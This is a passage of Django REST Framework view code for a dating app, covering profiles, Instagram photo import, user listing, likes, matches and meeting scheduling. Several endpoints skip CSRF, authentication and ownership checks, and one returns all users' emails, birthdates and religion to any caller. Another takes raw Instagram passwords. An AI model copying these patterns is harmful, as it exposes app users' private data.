pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n \"living_in\": user.living_in,\n \"hometown\": user.hometown,\n \"profession\": user.profession,\n \"college_name\": user.college_name,\n \"university\": user.university,\n \"personality\": user.personality,\n \"preference_first_date\": user.preference_first_date,\n \"fav_music\": user.fav_music,\n \"food_type\": user.food_type,\n \"owns\": user.owns,\n \"travelled_place\": user.travelled_place,\n \"once_in_life\": user.once_in_life,\n \"exercise\": user.exercise,\n \"looking_for\": user.looking_for,\n \"fav_food\": user.fav_food,\n \"fav_pet\": user.fav_pet,\n \"smoke\": user.smoke,\n \"drink\": user.drink,\n \"subscription_purchased\": user.subscription_purchased,\n \"subscription_purchased_at\": user.subscription_purchased_at,\n }\n return Response(detail, HTTP_200_OK)\n\n\nclass 
UserProfileUpdateView(UpdateAPIView):\n serializer_class = UserDetailSerializer\n queryset = UserDetail.objects.all()\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.bio = request.data.get(\"bio\")\n instance.living_in = request.data.get(\"living_in\")\n instance.hometown = request.data.get(\"hometown\")\n instance.profession = request.data.get(\"profession\")\n instance.college_name = request.data.get(\"college_name\")\n instance.university = request.data.get(\"university\")\n instance.personality = request.data.get(\"personality\")\n instance.preference_first_date = request.data.get(\n \"preference_first_date\")\n instance.fav_music = request.data.get(\"fav_music\")\n instance.food_type = request.data.get(\"food_type\")\n instance.owns = request.data.get(\"owns\")\n instance.travelled_place = request.data.get(\"travelled_place\")\n instance.once_in_life = request.data.get(\"once_in_life\")\n instance.exercise = request.data.get(\"exercise\")\n instance.looking_for = request.data.get(\"looking_for\")\n instance.fav_food = request.data.get(\"fav_food\")\n instance.fav_pet = request.data.get(\"fav_pet\")\n instance.smoke = request.data.get(\"smoke\")\n instance.drink = request.data.get(\"drink\")\n instance.subscription_purchased = request.data.get(\n \"subscription_purchased\")\n instance.subscription_purchased_at = request.data.get(\n \"subscription_purchased_at\")\n id = request.data.get(\"subscription\")\n id = int(id)\n subscription = SubscriptionPlans.objects.get(id=id)\n instance.subscription = subscription\n instance.save(\n update_fields=['bio', 'phone_number', 'living_in', 'hometown', 'profession', 'college_name', 'university',\n 'personality', 'preference_first_date', 'fav_music', 'travelled_place',\n 'once_in_life', 'exercise', 'looking_for', 'fav_food', 'owns', 'food_type', 'fav_pet',\n 'smoke', 'drink',\n 'subscription_purchased', 'subscription_purchased_at', 'subscription'])\n from_id = User.objects.filter(is_superuser=True)[0].id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type=\"Profile Update\",\n notification_title=\"Profile Update\",\n notification_body=\"Your profile has been updated\"\n )\n\n return Response({\"Profile update successfully\"}, status=HTTP_200_OK)\n\n\nclass GetUserInstagramPics(APIView):\n serializer_class = GetInstagramPicSerializer\n\n def post(self, request, *args, **kwargs):\n username = self.request.data['username']\n password = self.request.data['password']\n loader = instaloader.Instaloader()\n USERNAME = username\n PASSWORD = password\n DOWNLOADED_POST_DIRECTORY = \"Fetched_Posts\"\n try:\n loader.login(USERNAME, PASSWORD)\n except Exception as e:\n x = {\"Error\": str(e)}\n return Response(x[\"Error\"], status=HTTP_400_BAD_REQUEST)\n posts_array = instaloader.Profile.from_username(\n loader.context, USERNAME).get_posts()\n count = 0\n images = []\n number_of_posts = 0\n for post in posts_array:\n loader.download_post(post, DOWNLOADED_POST_DIRECTORY)\n number_of_posts += 1\n if number_of_posts == 10:\n break\n for f in os.listdir('./Fetched_Posts'):\n if 
f.endswith('.jpg'):\n if count >= 10:\n break\n images.append(f)\n count += 1\n if os.path.isdir(\"Fetched_Posts\"):\n shutil.rmtree(\"Fetched_Posts\")\n print(\"Deleted folder {} successfully\".format(\"Fetched_Posts\"))\n return Response({\"Success\": \"Downloaded images from instagram successfully\", \"Images\": images},\n status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserInstagramPicsAPIView(CreateAPIView):\n serializer_class = UserInstagramSerializer\n\n def post(self, request, *args, **kwargs):\n phone_number = self.request.data['id']\n p_no = RegisterUser.objects.get(id=phone_number)\n insta_pic_1 = self.request.data['insta_pic_1']\n insta_pic_2 = self.request.data['insta_pic_2']\n insta_pic_3 = self.request.data['insta_pic_3']\n insta_pic_4 = self.request.data['insta_pic_4']\n insta_pic_5 = self.request.data['insta_pic_5']\n insta_pic_6 = self.request.data['insta_pic_6']\n insta_pic_7 = self.request.data['insta_pic_7']\n insta_pic_8 = self.request.data['insta_pic_8']\n insta_pic_9 = self.request.data['insta_pic_9']\n insta_pic_10 = self.request.data['insta_pic_10']\n UserInstagramPic.objects.create(\n phone_number=p_no,\n insta_pic_1=insta_pic_1,\n insta_pic_2=insta_pic_2,\n insta_pic_3=insta_pic_3,\n insta_pic_4=insta_pic_4,\n insta_pic_5=insta_pic_5,\n insta_pic_6=insta_pic_6,\n insta_pic_7=insta_pic_7,\n insta_pic_8=insta_pic_8,\n insta_pic_9=insta_pic_9,\n insta_pic_10=insta_pic_10,\n insta_connect=True\n )\n return Response({\"Success\": \"Images uploaded from instagram successfully\"},\n status=HTTP_201_CREATED)\n\n\nclass ShowInstagramPics(ListAPIView):\n serializer_class = ShowInstaPics\n\n def get(self, request, *args, **kwargs):\n id = self.request.GET.get('phone_number')\n try:\n pics = UserInstagramPic.objects.get(phone_number=id)\n if pics:\n insta_pic_1 = pics.insta_pic_1\n insta_pic_2 = pics.insta_pic_2\n insta_pic_3 = pics.insta_pic_3\n insta_pic_4 = pics.insta_pic_4\n insta_pic_5 = pics.insta_pic_5\n insta_pic_6 = pics.insta_pic_6\n insta_pic_7 = pics.insta_pic_7\n insta_pic_8 = pics.insta_pic_8\n insta_pic_9 = pics.insta_pic_9\n insta_pic_10 = pics.insta_pic_10\n pics = {\n \"insta_pic_1\": insta_pic_1,\n \"insta_pic_2\": insta_pic_2,\n \"insta_pic_3\": insta_pic_3,\n \"insta_pic_4\": insta_pic_4,\n \"insta_pic_5\": insta_pic_5,\n \"insta_pic_6\": insta_pic_6,\n \"insta_pic_7\": insta_pic_7,\n \"insta_pic_8\": insta_pic_8,\n \"insta_pic_9\": insta_pic_9,\n \"insta_pic_10\": insta_pic_10,\n }\n return Response({\"pics\": pics}, status=HTTP_200_OK)\n except UserInstagramPic.DoesNotExist:\n return Response({\"No instagram pics\"}, status=HTTP_400_BAD_REQUEST)\n\n\nclass UserslistAPIView(APIView):\n model = UserDetail\n serializer_class = UserDetailSerializer\n\n def get(self, request, *args, **kwargs):\n # queryset needed to be filtered\n logged_in_user_id = self.request.GET.get('id')\n # queryset1 = RegisterUser.objects.all().exclude(id=logged_in_user_id).values()\n users = []\n # for obj in queryset1:\n # users.append(obj)\n # return Response({\"Users\":users}, HTTP_200_OK)\n if (UserDetail.objects.all().exclude(id=logged_in_user_id)).count() > 0:\n for obj in UserDetail.objects.all().exclude(id=logged_in_user_id):\n id = obj.id\n bio = obj.bio\n first_name = obj.phone_number.first_name\n last_name = obj.phone_number.last_name\n email = obj.phone_number.email\n gender = obj.phone_number.gender\n date_of_birth = obj.phone_number.date_of_birth\n job_profile = obj.phone_number.job_profile\n company_name = obj.phone_number.company_name\n qualification = 
obj.phone_number.qualification\n relationship_status = obj.phone_number.relationship_status\n interests = obj.phone_number.interests\n fav_quote = obj.phone_number.fav_quote\n religion = obj.phone_number.religion\n body_type = obj.phone_number.body_type\n verified = obj.phone_number.verified\n fb_signup = obj.phone_number.fb_signup\n if obj.phone_number.pic_1:\n pic_1 = obj.phone_number.pic_1.url\n else:\n pic_1 = ''\n if obj.phone_number.pic_2:\n pic_2 = obj.phone_number.pic_2.url\n else:\n pic_2 = ''\n if obj.phone_number.pic_3:\n pic_3 = obj.phone_number.pic_3.url\n else:\n pic_3 = ''\n if obj.phone_number.pic_4:\n pic_4 = obj.phone_number.pic_4.url\n else:\n pic_4 = ''\n if obj.phone_number.pic_5:\n pic_5 = obj.phone_number.pic_5.url\n else:\n pic_5 = ''\n if obj.phone_number.pic_6:\n pic_6 = obj.phone_number.pic_6.url\n else:\n pic_6 = ''\n if obj.phone_number.pic_7:\n pic_7 = obj.phone_number.pic_7.url\n else:\n pic_7 = ''\n if obj.phone_number.pic_8:\n pic_8 = obj.phone_number.pic_8.url\n else:\n pic_8 = ''\n if obj.phone_number.pic_9:\n pic_9 = obj.phone_number.pic_9.url\n else:\n pic_9 = ''\n living_in = obj.living_in\n hometown = obj.hometown\n profession = obj.profession\n college_name = obj.college_name\n university = obj.university\n personality = obj.personality\n preference_first_date = obj.preference_first_date\n fav_music = obj.fav_music\n travelled_place = obj.travelled_place\n once_in_life = obj.once_in_life\n exercise = obj.exercise\n looking_for = obj.looking_for\n fav_food = obj.fav_food\n fav_pet = obj.fav_pet\n smoke = obj.smoke\n drink = obj.drink\n subscription_purchased = obj.subscription_purchased\n subscription_purchased_at = obj.subscription_purchased_at\n # subscription = obj.subscription.values()\n detail = {\n \"id\": id,\n \"bio\": bio,\n \"first_name\": first_name,\n \"last_name\": last_name,\n \"email\": email,\n \"gender\": gender,\n \"date_of_birth\": date_of_birth,\n \"job_profile\": job_profile,\n \"company_name\": company_name,\n \"qualification\": qualification,\n \"relationship_status\": relationship_status,\n \"interests\": interests,\n \"fav_quote\": fav_quote,\n \"religion\": religion,\n \"body_type\": body_type,\n \"verified\": verified,\n \"fb_signup\": fb_signup,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n \"living_in\": living_in,\n \"hometown\": hometown,\n \"profession\": profession,\n \"college_name\": college_name,\n \"university\": university,\n \"personality\": personality,\n \"preference_first_date\": preference_first_date,\n \"fav_music\": fav_music,\n \"travelled_place\": travelled_place,\n \"once_in_life\": once_in_life,\n \"exercise\": exercise,\n \"looking_for\": looking_for,\n \"fav_food\": fav_food,\n \"fav_pet\": fav_pet,\n \"smoke\": smoke,\n \"drink\": drink,\n \"subscription_purchased\": subscription_purchased,\n \"subscription_purchased_at\": subscription_purchased_at,\n # \"subscription\": subscription\n }\n users.append(detail)\n return Response(users, HTTP_200_OK)\n else:\n return Response({\"There are no users\"}, status=HTTP_200_OK)\n\n\nclass UserDetailAPIView(APIView):\n model = UserDetail\n serializer_class = UserDetailSerializer\n\n def get(self, request, *args, **kwargs):\n phone_number = self.request.GET.get('id')\n # queryset = UserDetail.objects.filter(id=phone_number).values()\n queryset = UserDetail.objects.filter(id=phone_number)\n for obj in queryset:\n bio = obj.bio\n 
first_name = obj.phone_number.first_name\n last_name = obj.phone_number.last_name\n email = obj.phone_number.email\n gender = obj.phone_number.gender\n date_of_birth = obj.phone_number.date_of_birth\n dob = str(date_of_birth)\n x = dob.split('-')\n y = str(timezone.now().date())\n current_year = y.split('-')\n age = int(current_year[0]) - int(x[0])\n job_profile = obj.phone_number.job_profile\n company_name = obj.phone_number.company_name\n qualification = obj.phone_number.qualification\n relationship_status = obj.phone_number.relationship_status\n interests = obj.phone_number.interests\n fav_quote = obj.phone_number.fav_quote\n religion = obj.phone_number.religion\n body_type = obj.phone_number.body_type\n verified = obj.phone_number.verified\n fb_signup = obj.phone_number.fb_signup\n if obj.phone_number.pic_1:\n pic_1 = obj.phone_number.pic_1.url\n else:\n pic_1 = ''\n if obj.phone_number.pic_2:\n pic_2 = obj.phone_number.pic_2.url\n else:\n pic_2 = ''\n if obj.phone_number.pic_3:\n pic_3 = obj.phone_number.pic_3.url\n else:\n pic_3 = ''\n if obj.phone_number.pic_4:\n pic_4 = obj.phone_number.pic_4.url\n else:\n pic_4 = ''\n if obj.phone_number.pic_5:\n pic_5 = obj.phone_number.pic_5.url\n else:\n pic_5 = ''\n if obj.phone_number.pic_6:\n pic_6 = obj.phone_number.pic_6.url\n else:\n pic_6 = ''\n if obj.phone_number.pic_7:\n pic_7 = obj.phone_number.pic_7.url\n else:\n pic_7 = ''\n if obj.phone_number.pic_8:\n pic_8 = obj.phone_number.pic_8.url\n else:\n pic_8 = ''\n if obj.phone_number.pic_9:\n pic_9 = obj.phone_number.pic_9.url\n else:\n pic_9 = ''\n living_in = obj.living_in\n hometown = obj.hometown\n profession = obj.profession\n college_name = obj.college_name\n university = obj.university\n personality = obj.personality\n preference_first_date = obj.preference_first_date\n fav_music = obj.fav_music\n travelled_place = obj.travelled_place\n once_in_life = obj.once_in_life\n exercise = obj.exercise\n looking_for = obj.looking_for\n food_type = obj.food_type\n owns = obj.owns\n fav_food = obj.fav_food\n fav_pet = obj.fav_pet\n smoke = obj.smoke\n drink = obj.drink\n subscription_purchased = obj.subscription_purchased\n subscription_purchased_at = obj.subscription_purchased_at\n # subscription = obj.subscription.values()\n detail = {\n \"bio\": bio,\n \"first_name\": first_name,\n \"last_name\": last_name,\n \"email\": email,\n \"gender\": gender,\n \"date_of_birth\": date_of_birth,\n \"age\": age,\n \"job_profile\": job_profile,\n \"company_name\": company_name,\n \"qualification\": qualification,\n \"relationship_status\": relationship_status,\n \"interests\": interests,\n \"fav_quote\": fav_quote,\n \"religion\": religion,\n \"body_type\": body_type,\n \"verified\": verified,\n \"fb_signup\": fb_signup,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n \"living_in\": living_in,\n \"hometown\": hometown,\n \"profession\": profession,\n \"college_name\": college_name,\n \"university\": university,\n \"personality\": personality,\n \"preference_first_date\": preference_first_date,\n \"fav_music\": fav_music,\n \"travelled_place\": travelled_place,\n \"once_in_life\": once_in_life,\n \"exercise\": exercise,\n \"looking_for\": looking_for,\n \"food_type\": food_type,\n \"owns\": owns,\n \"fav_food\": fav_food,\n \"fav_pet\": fav_pet,\n \"smoke\": smoke,\n \"drink\": drink,\n \"subscription_purchased\": subscription_purchased,\n \"subscription_purchased_at\": 
subscription_purchased_at,\n # \"subscription\": subscription\n }\n return Response({\"Details\": detail}, status=HTTP_200_OK)\n return Response({\"Details\": queryset}, status=HTTP_200_OK)\n\n\nclass SnippetFilter(rest_framework.FilterSet):\n qualification = rest_framework.CharFilter(lookup_expr='exact')\n relationship_status = rest_framework.CharFilter(lookup_expr='exact')\n religion = rest_framework.CharFilter(lookup_expr='exact')\n body_type = rest_framework.CharFilter(lookup_expr='exact')\n gender = rest_framework.CharFilter(lookup_expr='exact')\n interests = rest_framework.CharFilter(lookup_expr='exact')\n\n class Meta:\n model = RegisterUser\n fields = ['qualification', 'relationship_status',\n 'religion', 'body_type', 'gender', 'interests']\n # fileds = {\n # 'qualification': ['icontains'],\n # 'relationship_status': ['icontains'],\n # 'religion': ['icontains'],\n # 'body_type': ['icontains'],\n # 'gender': ['icontains'],\n # 'interests': ['icontains'],\n #\n # }\n\n\n# class SearchUser(ListCreateAPIView):\n# model = RegisterUser\n# serializer_class = RegisterSerializer\n# filter_backends = (rest_framework.DjangoFilterBackend,)\n# filterset_class = SnippetFilter\n# queryset = RegisterUser.objects.all()\n\n# def get_queryset(self):\n# queryset = RegisterUser.objects.all()\n# print(self.request.data)\n# qualification = self.request.GET.get('qualification', None)\n# relationship_status = self.request.GET.get('relationship_status', None)\n# religion = self.request.GET.get('religion', None)\n# body_type = self.request.GET.get('body_type', None)\n# gender = self.request.GET.get('gender', None)\n# interests = self.request.GET.get('interests', None)\n# relationship_status = self.request.data['relationship_status']\n# religion = self.request.data['religion']\n# body_type = self.request.data['body_type']\n# gender = self.request.data['gender']\n# interests = self.request.data['interests']\n# print('Qualification ', qualification)\n# if qualification is not None:\n# queryset = RegisterUser.objects.filter(Q(qualification__exact=qualification) |\n# Q(relationship_status__exact=relationship_status) |\n# Q(interests__exact=interests) |\n# Q(gender__exact=gender) |\n# Q(religion__exact=religion) |\n# Q(body_type__exact=body_type)\n# )\n# print('>>>>>>>>>>>>>>>>>>>>', queryset)\n# return queryset\n\n\nclass SearchUser(CreateAPIView):\n serializer_class = SearchSerializer\n\n def post(self, request, *args, **kwargs):\n data = self.request.data\n # print('>>>>>>>>>>>>>>>>>',data)\n qualification = self.request.data['qualification']\n relationship_status = self.request.data['relationship_status']\n religion = self.request.data['religion']\n body_type = self.request.data['body_type']\n gender = self.request.data['gender']\n interests = self.request.data['interests']\n # qualification = self.request.POST.get('qualification', None)\n # relationship_status = self.request.POST.get('relationship_status', None)\n # religion = self.request.POST.get('religion', None)\n # body_type = self.request.POST.get('body_type', None)\n # gender = self.request.POST.get('gender', None)\n # interests = self.request.POST.get('interests', None)\n if data:\n qs = RegisterUser.objects.filter(Q(qualification__exact=qualification) &\n Q(relationship_status__exact=relationship_status) &\n Q(interests__exact=interests) &\n Q(gender__exact=gender) &\n Q(religion__exact=religion) &\n Q(body_type__exact=body_type)\n ).values()\n return Response(qs, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass 
LikeUserAPIView(CreateAPIView):\n model = MatchedUser\n serializer_class = LikeSerializer\n\n def post(self, request, *args, **kwargs):\n logged_in_user_id = self.request.data['id']\n users_liked_by_me = MatchedUser.objects.filter(\n liked_by_me=logged_in_user_id)\n users_liked_by_me_list = []\n for obj in users_liked_by_me:\n y = obj.user.id\n users_liked_by_me_list.append(y)\n liked_by_me = self.request.data['liked_by_me']\n\n if int(liked_by_me) not in users_liked_by_me_list:\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(user=register_user, matched='No')\n user.liked_by_me.add(liked_by_me)\n to_user_id = RegisterUser.objects.get(id=liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Like Notification',\n notification_title='Like Notification',\n notification_body=\"You have been liked by \" + from_user_name\n )\n return Response({\"You have liked a user\"}, status=HTTP_200_OK)\n else:\n liked_by_me = self.request.data['liked_by_me']\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(\n user=register_user, matched='Yes')\n user.liked_by_me.add(liked_by_me)\n to_user_id = RegisterUser.objects.get(id=liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Match Notification',\n notification_title='Match Notification',\n notification_body=\"You have been matched with \" + from_user_name\n )\n return Response({\"You have matched with a user\"}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass SuperLikeUserAPIView(CreateAPIView):\n model = MatchedUser\n serializer_class = SuperLikeSerializer\n\n def post(self, request, *args, **kwargs):\n logged_in_user_id = self.request.data['id']\n users_super_liked_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id)\n users_super_liked_me_list = []\n for obj in users_super_liked_me:\n y = obj.user.id\n users_super_liked_me_list.append(y)\n super_liked_by_me = self.request.data['super_liked_by_me']\n if int(super_liked_by_me) not in users_super_liked_me_list:\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(\n user=register_user, super_matched='No')\n user.super_liked_by_me.add(super_liked_by_me)\n to_user_id = RegisterUser.objects.get(id=super_liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Like Notification',\n notification_title='Like Notification',\n notification_body=\"You have been super liked by \" + from_user_name\n )\n return Response({\"You have super liked a user\"}, status=HTTP_200_OK)\n else:\n super_liked_by_me = self.request.data['super_liked_by_me']\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(\n user=register_user, super_matched='Yes')\n user.super_liked_by_me.add(super_liked_by_me)\n to_user_id = 
RegisterUser.objects.get(id=super_liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Match Notification',\n notification_title='Match Notification',\n notification_body=\"You have matched with \" + from_user_name\n )\n return Response({\"You have super matched with a user\"}, status=HTTP_200_OK)\n\n\nclass GetMatchesAPIView(ListAPIView):\n model = MatchedUser\n serializer_class = MatchedUserSerializer\n\n def get(self, request, *args, **kwargs):\n user_id = self.request.data['user_id']\n liked_me = MatchedUser.objects.filter(\n liked_by_me=user_id).exclude(user=user_id).distinct()\n liked_me_list = [obj.user.first_name for obj in liked_me]\n liked_by_me = MatchedUser.objects.filter(user=user_id).distinct()\n liked_by_me_list = []\n for obj in liked_by_me:\n y = obj.liked_by_me.all()\n for z in y:\n liked_by_me_list.append(z.first_name)\n super_liked_me = MatchedUser.objects.filter(\n super_liked_by_me=user_id).exclude(user=user_id).distinct()\n super_liked_by_me = MatchedUser.objects.filter(user=user_id).distinct()\n super_liked_me_list = [x.user.first_name for x in super_liked_me]\n super_liked_by_me_list = []\n for obj in super_liked_by_me:\n y = obj.super_liked_by_me.all()\n for z in y:\n super_liked_by_me_list.append(z.first_name)\n match = []\n super_match = []\n x = set(liked_by_me_list) & set(liked_me_list)\n match.append(x)\n y = set(super_liked_me_list) & set(super_liked_by_me_list)\n super_match.append(y)\n return Response({\"Matches\": match, \"Super Matches\": super_match}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass DeleteMatchesAPIView(APIView):\n model = MatchedUser\n serializer_class = DeleteMatchSerializer\n\n def get(self, request, *args, **kwargs):\n logged_in_user_id = self.request.data['id']\n liked_by_me = MatchedUser.objects.filter(\n liked_by_me=logged_in_user_id).values()\n return Response({\"LikedUsers\": liked_by_me}, status=HTTP_200_OK)\n\n def post(self, request, *args, **kwargs):\n data = self.request.data\n liked = self.request.data['liked_by_me']\n logged_in_user_id = self.request.data['id']\n liked_by_me = MatchedUser.objects.filter(liked_by_me=logged_in_user_id)\n liked = int(liked)\n x = []\n for obj in liked_by_me:\n y = obj.user.id\n x.append(y)\n if liked and liked in x:\n MatchedUser.objects.filter(liked_by_me=liked).delete()\n return Response({\"User removed successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"Cannot be removed. 
User is not a match\"}, status=HTTP_400_BAD_REQUEST)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass DeleteSuperMatchesAPIView(APIView):\n model = MatchedUser\n serializer_class = DeleteSuperMatchSerializer\n\n def get(self, request, *args, **kwargs):\n data = self.request.data\n logged_in_user_id = self.request.data['id']\n super_liked_by_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id).values()\n return Response({\"SuperLiked Users\": super_liked_by_me}, status=HTTP_200_OK)\n\n def post(self, request, *args, **kwargs):\n data = self.request.data\n # id = self.request.data['id']\n logged_in_user_id = self.request.data['id']\n super_liked = self.request.data['super_liked_by_me']\n super_liked_by_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id)\n super_liked = int(super_liked)\n x = []\n for obj in super_liked_by_me:\n y = obj.user.id\n x.append(y)\n if super_liked and super_liked in x:\n MatchedUser.objects.filter(super_liked_by_me=super_liked).delete()\n return Response({\"User removed successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"User cannot be removed. User is not a super match\"}, status=HTTP_400_BAD_REQUEST)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass RequestMeetingAPIView(CreateAPIView):\n model = RequestMeeting\n serializer_class = RequestMeetingSerializer\n\n def post(self, request, *args, **kwargs):\n print('_____________', self.request.data)\n phone_number = self.request.data['phone_number']\n logged_in_user_id = self.request.data['id']\n requested_user = RegisterUser.objects.get(id=phone_number)\n from_id = logged_in_user_id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n liked_by_me = MatchedUser.objects.filter(liked_by_me=logged_in_user_id)\n super_liked_by_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id)\n liked_by = MatchedUser.objects.filter(liked_by=logged_in_user_id)\n super_liked_by = MatchedUser.objects.filter(\n super_liked_by=logged_in_user_id)\n liked_by_list = [x.id for x in liked_by]\n super_liked_by_list = [x.id for x in super_liked_by]\n liked_by_me_list = [x.id for x in liked_by_me]\n super_liked_by_me_list = [x.id for x in super_liked_by_me]\n if requested_user in liked_by_list and requested_user in liked_by_me_list:\n RequestMeeting.objects.create(\n phone_number=requested_user\n )\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type=\"Meeting\",\n notification_title=\"Meeting request\",\n notification_body=\"You have a meeting request from \" + first_name\n\n )\n return Response({\"Request sent successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"Cannot send request as the user is not a match\"}, status=HTTP_400_BAD_REQUEST)\n\n\nclass MeetingStatusAPIView(UpdateAPIView):\n model = RequestMeeting\n serializer_class = MeetingStatusSerializer\n queryset = RequestMeeting.objects.all()\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.status = request.data.get(\"status\")\n instance.save(update_fields=['status'])\n logged_in_user_id = self.request.data['id']\n from_id = logged_in_user_id\n from_user_id 
= RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n status = self.request.data['status']\n\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type='Meeting Status',\n notification_title='Meeting Status Update',\n notification_body='Your meeting request status with ' +\n from_user_name + ' has changed to ' + status\n )\n return Response({\"Meeting status has been updated successfully\"}, status=HTTP_200_OK)\n\n\nclass ScheduleMeetingAPIView(CreateAPIView):\n model = ScheduleMeeting\n serializer_class = ScheduleMeetingSerializer\n\n def post(self, request, *args, **kwargs):\n phone_number = self.request.data['phone_number']\n logged_in_user_id = self.request.data['id']\n requested_user = RegisterUser.objects.get(id=phone_number)\n scheduled_by = RegisterUser.objects.get(id=logged_in_user_id)\n meeting_date = self.request.data['meeting_date']\n meeting_time = self.request.data['meeting_time']\n venue = self.request.data['venue']\n description = self.request.data['description']\n status = self.request.data['status']\n from_id = logged_in_user_id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n if scheduled_by.gender == 'Female':\n ScheduleMeeting.objects.create(\n scheduled_with=requested_user,\n scheduled_by=scheduled_by,\n meeting_date=meeting_date,\n meeting_time=meeting_time,\n venue=venue,\n description=description,\n status=status\n )\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type='Meeting Schedule',\n notification_title='Meeting Schedule Request',\n notification_body='You have a meeting scheduled with ' + from_user_name\n )\n return Response({\"Meeting schedule sent successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"Only females are allowed to send meeting requests\"}, status=HTTP_400_BAD_REQUEST)\n\n\nclass FeedbackApiView(CreateAPIView):\n model = Feedback\n serializer_class = FeedbackSerializer\n\n\nclass ContactUsApiView(ListCreateAPIView):\n model = ContactUs\n serializer_class = ContactUsSerializer\n queryset = ContactUs.objects.all()\n\n\nclass AboutUsApiView(ListCreateAPIView):\n model = AboutUs\n serializer_class = AboutUsSerializer\n queryset = AboutUs.objects.all()\n\n\nclass EditAboutUsAPIView(UpdateAPIView):\n model = AboutUs\n serializer_class = AboutUsSerializer\n queryset = AboutUs.objects.all()\n\n\nclass EditContactUsApiView(UpdateAPIView):\n model = ContactUs\n serializer_class = ContactUsSerializer\n queryset = ContactUs.objects.all()\n\n\nclass FacebookSignupApiView(CreateAPIView):\n serializer_class = SocialUserSerializer\n\n def post(self, request, *args, **kwargs):\n email = self.request.POST.get('email' or None)\n phone_number = self.request.POST.get('phone_number' or None)\n first_name = self.request.data['first_name']\n last_name = self.request.data['last_name']\n gender 
